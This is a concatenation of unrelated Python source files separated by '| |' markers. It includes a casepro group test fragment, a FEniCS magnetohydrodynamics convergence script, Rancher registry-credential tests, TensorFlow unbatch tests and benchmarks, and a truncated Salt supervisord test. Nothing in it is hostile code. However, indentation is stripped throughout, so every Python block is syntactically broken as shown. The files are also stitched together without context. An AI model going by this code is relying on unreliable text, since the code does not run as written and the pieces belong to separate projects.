self.assertEqual(list(response.context["object_list"]), [self.females, self.males, self.registered])
def test_select(self):
url = reverse("contacts.group_select")
# partner users can't access this
self.login(self.user1)
response = self.url_get("unicef", url)
self.assertLoginRedirect(response, url)
# org admins can
self.login(self.admin)
response = self.url_get("unicef", url)
self.assertEqual(
set(response.context["form"]["groups"].field.initial), {self.females.pk, self.males.pk, self.registered.pk}
)
# change the visible groups
response = self.url_post("unicef", url, {"groups": [self.females.pk, self.reporters.pk]})
self.assertRedirects(response, "/group/", fetch_redirect_response=False)
self.assertEqual(set(Group.get_all(self.unicef, visible=True)), {self.females, self.reporters})
self.assertEqual(set(Group.get_all(self.unicef, visible=False)), {self.males, self.registered})
class TasksTest(BaseCasesTest):
@patch("casepro.test.TestBackend.pull_fields")
@patch("casepro.test.TestBackend.pull_groups")
@patch("casepro.test.TestBackend.pull_contacts")
def test_pull_contacts(self, mock_pull_contacts, mock_pull_groups, mock_pull_fields):
mock_pull_fields.return_value = (1, 2, 3, 4)
mock_pull_groups.return_value = (5, 6, 7, 8)
mock_pull_contacts.return_value = (9, 10, 11, 12)
pull_contacts(self.unicef.pk)
task_state = TaskState.objects.get(org=self.unicef, task_key="contact-pull")
self.assertEqual(
task_state.get_last_results(),
{
"fields": {"created": 1, "updated": 2, "deleted": 3},
"groups": {"created": 5, "updated": 6, "deleted": 7},
"contacts": {"created": 9, "updated": 10, "deleted": 11},
},
)
| |
#!/usr/bin/python
# interpolate scalar gradient onto nedelec space
from dolfin import *
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
Print = PETSc.Sys.Print
# from MatrixOperations import *
import numpy as np
#import matplotlib.pylab as plt
import PETScIO as IO
import common
import scipy
import scipy.io
import time
import BiLinear as forms
import IterOperations as Iter
import MatrixOperations as MO
import CheckPetsc4py as CP
import ExactSol
import Solver as S
import MHDmatrixPrecondSetup as PrecondSetup
import NSprecondSetup
m = 6
errL2u =np.zeros((m-1,1))
errH1u =np.zeros((m-1,1))
errL2p =np.zeros((m-1,1))
errL2b =np.zeros((m-1,1))
errCurlb =np.zeros((m-1,1))
errL2r =np.zeros((m-1,1))
errH1r =np.zeros((m-1,1))
l2uorder = np.zeros((m-1,1))
H1uorder =np.zeros((m-1,1))
l2porder = np.zeros((m-1,1))
l2border = np.zeros((m-1,1))
Curlborder =np.zeros((m-1,1))
l2rorder = np.zeros((m-1,1))
H1rorder = np.zeros((m-1,1))
NN = np.zeros((m-1,1))
DoF = np.zeros((m-1,1))
Velocitydim = np.zeros((m-1,1))
Magneticdim = np.zeros((m-1,1))
Pressuredim = np.zeros((m-1,1))
Lagrangedim = np.zeros((m-1,1))
Wdim = np.zeros((m-1,1))
iterations = np.zeros((m-1,1))
SolTime = np.zeros((m-1,1))
udiv = np.zeros((m-1,1))
MU = np.zeros((m-1,1))
level = np.zeros((m-1,1))
NSave = np.zeros((m-1,1))
Mave = np.zeros((m-1,1))
TotalTime = np.zeros((m-1,1))
nn = 2
dim = 2
ShowResultPlots = 'yes'
split = 'Linear'
MU[0]= 1e0
for xx in xrange(1,m):
print xx
level[xx-1] = xx+1
nn = 2**(level[xx-1])
# Create mesh and define function space
nn = int(nn)
NN[xx-1] = nn/2
# parameters["form_compiler"]["quadrature_degree"] = 6
# parameters = CP.ParameterSetup()
mesh = UnitSquareMesh(nn,nn)
order = 1
parameters['reorder_dofs_serial'] = False
Velocity = VectorFunctionSpace(mesh, "CG", order)
Pressure = FunctionSpace(mesh, "DG", order-1)
Magnetic = FunctionSpace(mesh, "N1curl", order)
Lagrange = FunctionSpace(mesh, "CG", order)
W = MixedFunctionSpace([Magnetic, Velocity,Pressure, Lagrange])
# W = Velocity*Pressure*Magnetic*Lagrange
Velocitydim[xx-1] = Velocity.dim()
Pressuredim[xx-1] = Pressure.dim()
Magneticdim[xx-1] = Magnetic.dim()
Lagrangedim[xx-1] = Lagrange.dim()
Wdim[xx-1] = W.dim()
print "\n\nW: ",Wdim[xx-1],"Velocity: ",Velocitydim[xx-1],"Pressure: ",Pressuredim[xx-1],"Magnetic: ",Magneticdim[xx-1],"Lagrange: ",Lagrangedim[xx-1],"\n\n"
dim = [Magnetic.dim(), Velocity.dim(), Pressure.dim(), Lagrange.dim()]
def boundary(x, on_boundary):
return on_boundary
u0, p0,b0, r0, Laplacian, Advection, gradPres,CurlCurl, gradR, NS_Couple, M_Couple = ExactSol.MHD2D(4,1)
bcu = DirichletBC(W.sub(1),u0, boundary)
bcb = DirichletBC(W.sub(0),b0, boundary)
bcr = DirichletBC(W.sub(3),r0, boundary)
# bc = [u0,p0,b0,r0]
bcs = [bcu,bcb,bcr]
FSpaces = [Velocity,Pressure,Magnetic,Lagrange]
(u, p, b, r) = TrialFunctions(W)
(v, q, c,s ) = TestFunctions(W)
kappa = 1.0
Mu_m =1e1
MU = 1.0
IterType = 'Full'
F_NS = -MU*Laplacian+Advection+gradPres-kappa*NS_Couple
if kappa == 0:
F_M = Mu_m*CurlCurl+gradR -kappa*M_Couple
else:
F_M = Mu_m*kappa*CurlCurl+gradR -kappa*M_Couple
params = [kappa,Mu_m,MU]
# MO.PrintStr("Preconditioning MHD setup",5,"+","\n\n","\n\n")
HiptmairMatrices = PrecondSetup.MagneticSetup(Magnetic, Lagrange, b0, r0, 1e-6)
MO.PrintStr("Setting up MHD initial guess",5,"+","\n\n","\n\n")
u_k,p_k,b_k,r_k = common.InitialGuess(FSpaces,[u0,p0,b0,r0],[F_NS,F_M],params,HiptmairMatrices,1e-6,Neumann=Expression(("0","0")),options ="New", FS = "DG")
ones = Function(Pressure)
ones.vector()[:]=(0*ones.vector().array()+1)
# pConst = - assemble(p_k*dx)/assemble(ones*dx)
p_k.vector()[:] += - assemble(p_k*dx)/assemble(ones*dx)
x = Iter.u_prev(u_k,b_k,p_k,r_k)
KSPlinearfluids, MatrixLinearFluids = PrecondSetup.FluidLinearSetup(Pressure, MU)
kspFp, Fp = PrecondSetup.FluidNonLinearSetup(Pressure, MU, u_k)
# plot(b_k)
ns,maxwell,CoupleTerm,Lmaxwell,Lns = forms.MHD2D(mesh, W,F_M,F_NS, u_k,b_k,params,IterType,"DG", SaddlePoint = "number2")
RHSform = forms.PicardRHS(mesh, W, u_k, p_k, b_k, r_k, params,"DG",SaddlePoint = "number2")
bcu = DirichletBC(W.sub(0),Expression(("0.0","0.0")), boundary)
bcb = DirichletBC(W.sub(1),Expression(("0.0","0.0")), boundary)
bcr = DirichletBC(W.sub(3),Expression(("0.0")), boundary)
bcs = [bcu,bcb,bcr]
eps = 1.0 # error measure ||u-u_k||
tol = 1.0E-4 # tolerance
iter = 0 # iteration counter
maxiter = 40 # max no of iterations allowed
SolutionTime = 0
outer = 0
# parameters['linear_algebra_backend'] = 'uBLAS'
# FSpaces = [Velocity,Magnetic,Pressure,Lagrange]
if IterType == "CD":
AA, bb = assemble_system(maxwell+ns, (Lmaxwell + Lns) - RHSform, bcs)
A,b = CP.Assemble(AA,bb)
# u = b.duplicate()
# P = CP.Assemble(PP)
u_is = PETSc.IS().createGeneral(range(Velocity.dim()))
NS_is = PETSc.IS().createGeneral(range(Velocity.dim()+Pressure.dim()))
M_is = PETSc.IS().createGeneral(range(Velocity.dim()+Pressure.dim(),W.dim()))
OuterTol = 1e-5
InnerTol = 1e-3
NSits =0
Mits =0
TotalStart =time.time()
SolutionTime = 0
while eps > tol and iter < maxiter:
iter += 1
MO.PrintStr("Iter "+str(iter),7,"=","\n\n","\n\n")
tic()
if IterType == "CD":
bb = assemble((Lmaxwell + Lns) - RHSform)
for bc in bcs:
bc.apply(bb)
A,b = CP.Assemble(AA,bb)
# if iter == 1
if iter == 1:
u = b.duplicate()
F = A.getSubMatrix(u_is,u_is)
kspF = NSprecondSetup.LSCKSPnonlinear(F)
else:
AA, bb = assemble_system(maxwell+ns+CoupleTerm, (Lmaxwell + Lns) - RHSform, bcs)
A,b = CP.Assemble(AA,bb)
F = A.getSubMatrix(u_is,u_is)
kspF = NSprecondSetup.LSCKSPnonlinear(F)
# if iter == 1:
if iter == 1:
u = b.duplicate()
print ("{:40}").format("MHD assemble, time: "), " ==> ",("{:4f}").format(toc()), ("{:9}").format(" time: "), ("{:4}").format(time.strftime('%X %x %Z')[0:5])
kspFp, Fp = PrecondSetup.FluidNonLinearSetup(Pressure, MU, u_k)
print "Inititial guess norm: ", u.norm()
# ksp.solve(b, u)
# u,it1,it2 = S.solve(A,b,u,[NS_is,M_is],FSpaces,IterType,OuterTol,InnerTol,HiptmairMatrices,KSPlinearfluids,kspF,Fp,MatrixLinearFluids,kspFp)
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pcF = ksp.getPC()
ksp.setType('preonly')
pcF.setType('lu')
OptDB = PETSc.Options()
OptDB['pc_factor_mat_solver_package'] = "mumps"
OptDB['pc_factor_mat_ordering_type'] = "rcm"
ksp.setFromOptions()
ksp.setOperators(A)
stime = time.time()
ksp.solve(b,u)
Soltime = time.time()- stime
# NSits += it1
# Mits +=dodim
SolutionTime = SolutionTime +Soltime
u1, p1, b1, r1, eps= Iter.PicardToleranceDecouple(u,x,FSpaces,dim,"2",iter, SaddlePoint = "Yes")
p1.vector()[:] += - assemble(p1*dx)/assemble(ones*dx)
u_k.assign(u1)
p_k.assign(p1)
b_k.assign(b1)
r_k.assign(r1)
# if eps > 100 and iter > 3:
# print 22222
# break
uOld= np.concatenate((u_k.vector().array(),b_k.vector().array(),p_k.vector().array(),r_k.vector().array()), axis=0)
x = IO.arrayToVec(uOld)
# iter = 10000
# u_k,b_k,epsu,epsb=Iter.PicardTolerance(x,u_k,b_k,FSpaces,dim,"inf",iter)
XX= np.concatenate((u_k.vector().array(),p_k.vector().array(),b_k.vector().array(),r_k.vector().array()), axis=0)
print SolTime
SolTime[xx-1] = SolutionTime/iter
NSave[xx-1] = (float(NSits)/iter)
Mave[xx-1] = (float(Mits)/iter)
iterations[xx-1] = iter
TotalTime[xx-1] = time.time() - TotalStart
ue =u0
pe = p0
be = b0
re = r0
dim = [Velocity.dim(), Pressure.dim(), Magnetic.dim(),Lagrange.dim()]
ExactSolution = [ue,pe,be,re]
errL2u[xx-1], errH1u[xx-1], errL2p[xx-1], errL2b[xx-1], errCurlb[xx-1], errL2r[xx-1], errH1r[xx-1] = Iter.Errors(XX,mesh,FSpaces,ExactSolution,order,dim, "DG")
if xx > 1:
l2uorder[xx-1] = np.abs(np.log2(errL2u[xx-2]/errL2u[xx-1]))
H1uorder[xx-1] = np.abs(np.log2(errH1u[xx-2]/errH1u[xx-1]))
l2porder[xx-1] = np.abs(np.log2(errL2p[xx-2]/errL2p[xx-1]))
l2border[xx-1] = np.abs(np.log2(errL2b[xx-2]/errL2b[xx-1]))
Curlborder[xx-1] = np.abs(np.log2(errCurlb[xx-2]/errCurlb[xx-1]))
l2rorder[xx-1] = np.abs(np.log2(errL2r[xx-2]/errL2r[xx-1]))
H1rorder[xx-1] = np.abs(np.log2(errH1r[xx-2]/errH1r[xx-1]))
import pandas as pd
LatexTitles = ["l","DoFu","Dofp","V-L2","L2-order","V-H1","H1-order","P-L2","PL2-order"]
LatexValues = np.concatenate((level,Velocitydim,Pressuredim,errL2u,l2uorder,errH1u,H1uorder,errL2p,l2porder), axis=1)
LatexTable = pd.DataFrame(LatexValues, columns = LatexTitles)
pd.set_option('precision',3)
LatexTable = MO.PandasFormat(LatexTable,"V-L2","%2.4e")
LatexTable = MO.PandasFormat(LatexTable,'V-H1',"%2.4e")
LatexTable = MO.PandasFormat(LatexTable,"H1-order","%1.2f")
LatexTable = MO.PandasFormat(LatexTable,'L2-order',"%1.2f")
LatexTable = MO.PandasFormat(LatexTable,"P-L2","%2.4e")
LatexTable = MO.PandasFormat(LatexTable,'PL2-order',"%1.2f")
print LatexTable
print "\n\n Magnetic convergence"
MagneticTitles = ["l","B DoF","R DoF","B-L2","L2-order","B-Curl","HCurl-order"]
MagneticValues = np.concatenate((level,Magneticdim,Lagrangedim,errL2b,l2border,errCurlb,Curlborder),axis=1)
MagneticTable= pd.DataFrame(MagneticValues, columns = MagneticTitles)
pd.set_option('precision',3)
MagneticTable = MO.PandasFormat(MagneticTable,"B-Curl","%2.4e")
MagneticTable = MO.PandasFormat(MagneticTable,'B-L2',"%2.4e")
MagneticTable = MO.PandasFormat(MagneticTable,"L2-order","%1.2f")
MagneticTable = MO.PandasFormat(MagneticTable,'HCurl-order',"%1.2f")
print MagneticTable
# print "\n\n Lagrange convergence"
# LagrangeTitles = ["l","SolTime","B DoF","R DoF","R-L2","L2-order","R-H1","H1-order"]
# LagrangeValues = np.concatenate((level,SolTime,Magneticdim,Lagrangedim,errL2r,l2rorder,errH1r,H1rorder),axis=1)
# LagrangeTable= pd.DataFrame(LagrangeValues, columns = LagrangeTitles)
# pd.set_option('precision',3)
# LagrangeTable = MO.PandasFormat(LagrangeTable,"R-L2","%2.4e")
# LagrangeTable = MO.PandasFormat(LagrangeTable,'R-H1',"%2.4e")
# LagrangeTable = MO.PandasFormat(LagrangeTable,"H1-order","%1.2f")
# LagrangeTable = MO.PandasFormat(LagrangeTable,'L2-order',"%1.2f")
# print LagrangeTable
# print "\n\n Iteration table"
# if IterType == "Full":
# IterTitles = ["l","DoF","AV solve Time","Total picard time","picard iterations","Av Outer its","Av Inner its",]
# else:
# IterTitles = ["l","DoF","AV solve Time","Total picard time","picard iterations","Av NS iters","Av M iters"]
# IterValues = np.concatenate((level,Wdim,SolTime,TotalTime,iterations,NSave,Mave),axis=1)
# IterTable= pd.DataFrame(IterValues, columns = IterTitles)
# if IterType == "Full":
# IterTable = MO.PandasFormat(IterTable,'Av Outer its',"%2.1f")
# IterTable = MO.PandasFormat(IterTable,'Av Inner its',"%2.1f")
# else:
# IterTable = MO.PandasFormat(IterTable,'Av NS iters',"%2.1f")
# IterTable = MO.PandasFormat(IterTable,'Av M iters',"%2.1f")
# print IterTable.to_latex()
# print " \n Outer Tol: ",OuterTol, "Inner Tol: ", InnerTol
# # # if (ShowResultPlots == 'yes'):
# plot(u_k)
# plot(interpolate(ue,Velocity))
# plot(p_k)
# plot(interpolate(pe,Pressure))
# plot(b_k)
# plot(interpolate(be,Magnetic))
# plot(r_k)
# plot(interpolate(re,Lagrange))
# interactive()
interactive()
| |
from common_fixtures import * # NOQA
from gdapi import ApiError
TEST_IMAGE = 'ibuildthecloud/helloworld'
TEST_IMAGE_LATEST = TEST_IMAGE + ':latest'
TEST_IMAGE_UUID = 'docker:' + TEST_IMAGE
if_docker = pytest.mark.skipif("os.environ.get('DOCKER_TEST') == 'false'",
reason='DOCKER_TEST is not set')
def _create_registry(client):
server = 'server{0}.io'.format(random_num())
registry = client.create_registry(serverAddress=server,
name='Server')
registry = client.wait_success(registry)
assert registry.serverAddress == server
assert registry.name == 'Server'
return registry
def _create_registry_and_credential(client):
registry = _create_registry(client)
reg_cred = client.create_registry_credential(
registryId=registry.id,
publicValue='rancher',
secretValue='rancher')
reg_cred = client.wait_success(reg_cred)
assert reg_cred is not None
assert reg_cred.kind == 'registryCredential'
assert reg_cred.registryId == registry.id
assert reg_cred.publicValue == 'rancher'
assert reg_cred.secretValue is None
return reg_cred, registry
@if_docker
def test_create_container_with_registry_credential(client, context):
reg_cred, registry = _create_registry_and_credential(client)
uuid = TEST_IMAGE_UUID
container = client.create_container(name='test',
imageUuid=uuid,
startOnCreate=False,
registryCredentialId=reg_cred.id)
assert container is not None
assert container.registryCredentialId == reg_cred.id
assert container.startOnCreate is False
assert container.imageUuid == uuid
@if_docker
def _test_create_container_with_real_registry_credential(client,
docker_context):
reg_cred, registry = _create_registry_and_credential(client)
uuid = 'docker:registry.rancher.io/rancher/loop'
container = client.create_container(name='test',
imageUuid=uuid,
registryCredentialId=reg_cred.id)
assert container is not None
assert container.registryCredentialId == reg_cred.id
assert container.imageUuid == uuid
container = client.wait_success(container)
assert container.state == 'running'
def _crud_registry(client):
registry = _create_registry(client)
registry = client.wait_success(registry)
assert registry.state == 'active'
registry = client.wait_success(registry.deactivate())
assert registry.state == 'inactive'
registry = client.delete(registry)
registry = client.wait_success(registry)
assert registry.state == 'removed'
def _crud_registry_credential(client):
registry_credential, registry = _create_registry_and_credential(client)
registry_credential = client.wait_success(registry_credential)
assert registry_credential.state == 'active'
registry_credential = client.wait_success(registry_credential.deactivate())
assert registry_credential.state == 'inactive'
registry_credential = client.wait_success(
client.update(registry_credential, {
'publicValue': 'test',
'secretValue': 'rancher45',
}))
assert registry_credential.publicValue == 'test'
registry_credential = client.delete(registry_credential)
registry_credential = client.wait_success(registry_credential)
assert registry_credential.state == 'removed'
def test_crud_registry(client):
_crud_registry(client)
def test_crud_registry_credential(client):
_crud_registry_credential(client)
def test_deleting_registry_deletes_credentials(client):
reg_cred, registry = _create_registry_and_credential(client)
registry = client.wait_success(registry.deactivate())
registry = client.delete(registry)
registry = client.wait_success(registry)
assert registry.state == 'removed'
def is_state():
cred = client.reload(reg_cred)
if (cred.state == 'removed'):
return cred
print cred.state
return False
reg_cred = wait_for(is_state)
assert reg_cred.state == 'removed'
def test_container_image_and_registry_credential(client,
super_client):
server = 'server{0}.io'.format(random_num())
registry = client.create_registry(serverAddress=server,
name=random_str())
registry = client.wait_success(registry)
reg_cred = client.create_registry_credential(
registryId=registry.id,
publicValue='rancher',
secretValue='rancher')
registry_credential = client.wait_success(reg_cred)
name = server + '/rancher/authorized:latest'
image_uuid = 'docker:' + name
container = client.create_container(imageUuid=image_uuid,
name="test" + random_str(),
startOnCreate=False)
container = super_client.wait_success(container)
assert container.registryCredentialId == registry_credential.id
def test_duplicate_server_addresses(client):
server = 'server{0}.io'.format(random_num())
registry = client.create_registry(serverAddress=server,
name=random_str())
client.wait_success(registry)
with pytest.raises(ApiError) as e:
client.create_registry(serverAddress=server, name=random_str())
assert e.value.error.status == 400
assert e.value.error.code == 'ServerAddressUsed'
def test_create_same_registry_different_projects(admin_user_client):
server = 'server{0}.io'.format(random_num())
context_1 = create_context(admin_user_client, create_project=True)
context_2 = create_context(admin_user_client, create_project=True)
context_1.client.wait_success(context_1.client.create_registry(
serverAddress=server, name=random_str()))
context_2.client.wait_success(context_2.client.create_registry(
serverAddress=server, name=random_str()))
def test_registry_credentials(client, super_client, admin_user_client):
registry = _create_registry(client)
reg_cred = client.create_registry_credential(
registryId=registry.id,
publicValue='rancher',
secretValue='rancher')
reg_cred = client.wait_success(reg_cred)
assert reg_cred is not None
assert reg_cred.secretValue is None
projectadmin_client = create_context(admin_user_client,
create_project=False,
add_host=False,
kind='projectadmin').user_client
registry = _create_registry(projectadmin_client)
reg_cred = projectadmin_client.create_registry_credential(
registryId=registry.id,
publicValue='rancher',
secretValue='rancher')
reg_cred = projectadmin_client.wait_success(reg_cred)
assert reg_cred is not None
assert reg_cred.secretValue is not None
creds = client.list_registryCredential(publicValue=reg_cred.publicValue,
_role='projectadmin')
assert len(creds) >= 1
assert creds[0].secretValue is None
# only super admin can pass the role
creds = super_client.list_registryCredential(
publicValue=reg_cred.publicValue, _role='projectadmin')
assert len(creds) >= 1
assert creds[0].secretValue is not None
# validate that you can't pass other roles than projectadmin
creds = client.list_registryCredential(publicValue=reg_cred.publicValue,
_role='admin')
assert len(creds) >= 1
assert creds[0].secretValue is None
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.experimental.unbatch()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class UnbatchTest(test_base.DatasetTestBase, parameterized.TestCase):
def testUnbatchWithUnknownRankInput(self):
placeholder = array_ops.placeholder(dtypes.int32)
dataset = dataset_ops.Dataset.from_tensors(placeholder).apply(
batching.unbatch())
iterator = dataset.make_initializable_iterator()
next_elem = iterator.get_next()
with self.cached_session() as sess:
sess.run(iterator.initializer, feed_dict={placeholder: [0, 1, 2, 3]})
for i in range(4):
self.assertEqual(i, sess.run(next_elem))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_elem)
def testUnbatchScalarDataset(self):
data = tuple([math_ops.range(10) for _ in range(3)])
data = dataset_ops.Dataset.from_tensor_slices(data)
expected_types = (dtypes.int32,) * 3
data = data.batch(2)
self.assertEqual(expected_types, data.output_types)
data = data.apply(batching.unbatch())
self.assertEqual(expected_types, data.output_types)
iterator = data.make_one_shot_iterator()
op = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
self.assertEqual((i,) * 3, sess.run(op))
with self.assertRaises(errors.OutOfRangeError):
sess.run(op)
def testUnbatchDatasetWithStrings(self):
data = tuple([math_ops.range(10) for _ in range(3)])
data = dataset_ops.Dataset.from_tensor_slices(data)
data = data.map(lambda x, y, z: (x, string_ops.as_string(y), z))
expected_types = (dtypes.int32, dtypes.string, dtypes.int32)
data = data.batch(2)
self.assertEqual(expected_types, data.output_types)
data = data.apply(batching.unbatch())
self.assertEqual(expected_types, data.output_types)
iterator = data.make_one_shot_iterator()
op = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
self.assertEqual((i, compat.as_bytes(str(i)), i), sess.run(op))
with self.assertRaises(errors.OutOfRangeError):
sess.run(op)
def testUnbatchDatasetWithSparseTensor(self):
st = sparse_tensor.SparseTensorValue(
indices=[[i, i] for i in range(10)],
values=list(range(10)),
dense_shape=[10, 10])
data = dataset_ops.Dataset.from_tensors(st)
data = data.apply(batching.unbatch())
data = data.batch(5)
data = data.apply(batching.unbatch())
iterator = data.make_one_shot_iterator()
next_element = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
st_row = sess.run(next_element)
self.assertEqual([i], st_row.indices)
self.assertEqual([i], st_row.values)
self.assertEqual([10], st_row.dense_shape)
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
def testUnbatchDatasetWithDenseAndSparseTensor(self):
st = sparse_tensor.SparseTensorValue(
indices=[[i, i] for i in range(10)],
values=list(range(10)),
dense_shape=[10, 10])
data = dataset_ops.Dataset.from_tensors((list(range(10)), st))
data = data.apply(batching.unbatch())
data = data.batch(5)
data = data.apply(batching.unbatch())
iterator = data.make_one_shot_iterator()
next_element = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
dense_elem, st_row = sess.run(next_element)
self.assertEqual(i, dense_elem)
self.assertEqual([i], st_row.indices)
self.assertEqual([i], st_row.values)
self.assertEqual([10], st_row.dense_shape)
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
def testUnbatchSingleElementTupleDataset(self):
data = tuple([(math_ops.range(10),) for _ in range(3)])
data = dataset_ops.Dataset.from_tensor_slices(data)
expected_types = ((dtypes.int32,),) * 3
data = data.batch(2)
self.assertEqual(expected_types, data.output_types)
data = data.apply(batching.unbatch())
self.assertEqual(expected_types, data.output_types)
iterator = data.make_one_shot_iterator()
op = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
self.assertEqual(((i,),) * 3, sess.run(op))
with self.assertRaises(errors.OutOfRangeError):
sess.run(op)
def testUnbatchMultiElementTupleDataset(self):
data = tuple([(math_ops.range(10 * i, 10 * i + 10),
array_ops.fill([10], "hi")) for i in range(3)])
data = dataset_ops.Dataset.from_tensor_slices(data)
expected_types = ((dtypes.int32, dtypes.string),) * 3
data = data.batch(2)
self.assertAllEqual(expected_types, data.output_types)
data = data.apply(batching.unbatch())
self.assertAllEqual(expected_types, data.output_types)
iterator = data.make_one_shot_iterator()
op = iterator.get_next()
with self.cached_session() as sess:
for i in range(10):
self.assertEqual(((i, b"hi"), (10 + i, b"hi"), (20 + i, b"hi")),
sess.run(op))
with self.assertRaises(errors.OutOfRangeError):
sess.run(op)
def testUnbatchEmpty(self):
data = dataset_ops.Dataset.from_tensors(
(constant_op.constant([]), constant_op.constant([], shape=[0, 4]),
constant_op.constant([], shape=[0, 4, 0])))
data = data.apply(batching.unbatch())
iterator = data.make_one_shot_iterator()
next_element = iterator.get_next()
with self.cached_session() as sess:
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
def testUnbatchStaticShapeMismatch(self):
data = dataset_ops.Dataset.from_tensors((np.arange(7), np.arange(8),
np.arange(9)))
with self.assertRaises(ValueError):
data.apply(batching.unbatch())
def testUnbatchDynamicShapeMismatch(self):
ph1 = array_ops.placeholder(dtypes.int32, shape=[None])
ph2 = array_ops.placeholder(dtypes.int32, shape=None)
data = dataset_ops.Dataset.from_tensors((ph1, ph2))
data = data.apply(batching.unbatch())
iterator = data.make_initializable_iterator()
next_element = iterator.get_next()
with self.cached_session() as sess:
# Mismatch in the 0th dimension.
sess.run(
iterator.initializer,
feed_dict={
ph1: np.arange(7).astype(np.int32),
ph2: np.arange(8).astype(np.int32)
})
with self.assertRaises(errors.InvalidArgumentError):
sess.run(next_element)
# No 0th dimension (i.e. scalar value) for one component.
sess.run(
iterator.initializer,
feed_dict={
ph1: np.arange(7).astype(np.int32),
ph2: 7
})
with self.assertRaises(errors.InvalidArgumentError):
sess.run(next_element)
class UnbatchBenchmark(test.Benchmark):
def benchmarkNativeUnbatch(self):
batch_sizes = [1, 2, 5, 10, 20, 50]
elems_per_trial = 10000
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors("element").repeat(None)
batch_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
dataset = dataset.batch(batch_size_placeholder)
dataset = dataset.apply(batching.unbatch())
dataset = dataset.skip(elems_per_trial)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for batch_size in batch_sizes:
deltas = []
for _ in range(5):
sess.run(
iterator.initializer,
feed_dict={batch_size_placeholder: batch_size})
start = time.time()
sess.run(next_element.op)
end = time.time()
deltas.append((end - start) / elems_per_trial)
median_wall_time = np.median(deltas)
print("Unbatch (native) batch size: %d Median wall time per element:"
" %f microseconds" % (batch_size, median_wall_time * 1e6))
self.report_benchmark(
iters=10000,
wall_time=median_wall_time,
name="benchmark_unbatch_dataset_native_batch_size_%d" %
batch_size)
# Include a benchmark of the previous `unbatch()` implementation that uses
# a composition of more primitive ops. Eventually we'd hope to generate code
# that is as good in both cases.
def benchmarkOldUnbatchImplementation(self):
batch_sizes = [1, 2, 5, 10, 20, 50]
elems_per_trial = 10000
with ops.Graph().as_default():
dataset = dataset_ops.Dataset.from_tensors("element").repeat(None)
batch_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
dataset = dataset.batch(batch_size_placeholder)
dataset = dataset.flat_map(dataset_ops.Dataset.from_tensor_slices)
dataset = dataset.skip(elems_per_trial)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
with session.Session() as sess:
for batch_size in batch_sizes:
deltas = []
for _ in range(5):
sess.run(
iterator.initializer,
feed_dict={batch_size_placeholder: batch_size})
start = time.time()
sess.run(next_element.op)
end = time.time()
deltas.append((end - start) / elems_per_trial)
median_wall_time = np.median(deltas)
print("Unbatch (unfused) batch size: %d Median wall time per element:"
" %f microseconds" % (batch_size, median_wall_time * 1e6))
self.report_benchmark(
iters=10000,
wall_time=median_wall_time,
name="benchmark_unbatch_dataset_unfused_batch_size_%d" %
batch_size)
if __name__ == "__main__":
test.main()
| |
"""
Tests for the supervisord state
"""
# Import python lins
import os
import subprocess
import time
import salt.utils.path
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
from tests.support.case import ModuleCase
from tests.support.mixins import SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
@skipIf(
salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, "virtualenv not installed"
)
@skipIf(salt.utils.path.which("supervisorctl") is None, "supervisord not installed")
class SupervisordTest(ModuleCase, SaltReturnAssertsMixin):
"""
Validate the supervisord states.
"""
def setUp(self):
super().setUp()
self.venv_test_dir = os.path.join(RUNTIME_VARS.TMP, "supervisortests")
self.venv_dir = os.path.join(self.venv_test_dir, "venv")
self.supervisor_sock = os.path.join(self.venv_dir, "supervisor.sock")
if not os.path.exists(self.venv_dir):
os.makedirs(self.venv_test_dir)
self.run_function("virtualenv.create", [self.venv_dir])
self.run_function(
"pip.install", [], pkgs="supervisor", bin_env=self.venv_dir
)
self.supervisord = os.path.join(self.venv_dir, "bin", "supervisord")
if not os.path.exists(self.supervisord):
self.skipTest("Failed to installe supervisor in test virtualenv")
self.supervisor_conf = os.path.join(self.venv_dir, "supervisor.conf")
def start_supervisord(self, autostart=True):
self.run_state(
"file.managed",
name=self.supervisor_conf,
source="salt://supervisor.conf",
template="jinja",
context={
"supervisor_sock": self.supervisor_sock,
"virtual_env": self.venv_dir,
"autostart": autostart,
},
)
if not os.path.exists(self.supervisor_conf):
self.skipTest("failed to create supervisor config file")
self.supervisor_proc = subprocess.Popen(
[self.supervisord, "-c", self.supervisor_conf]
)
if self.supervisor_proc.poll() is not None:
self.skipTest("failed to start supervisord")
timeout = 10
while not os.path.exists(self.supervisor_sock):
if timeout == 0:
self.skipTest(
"supervisor socket not found - failed to start supervisord"
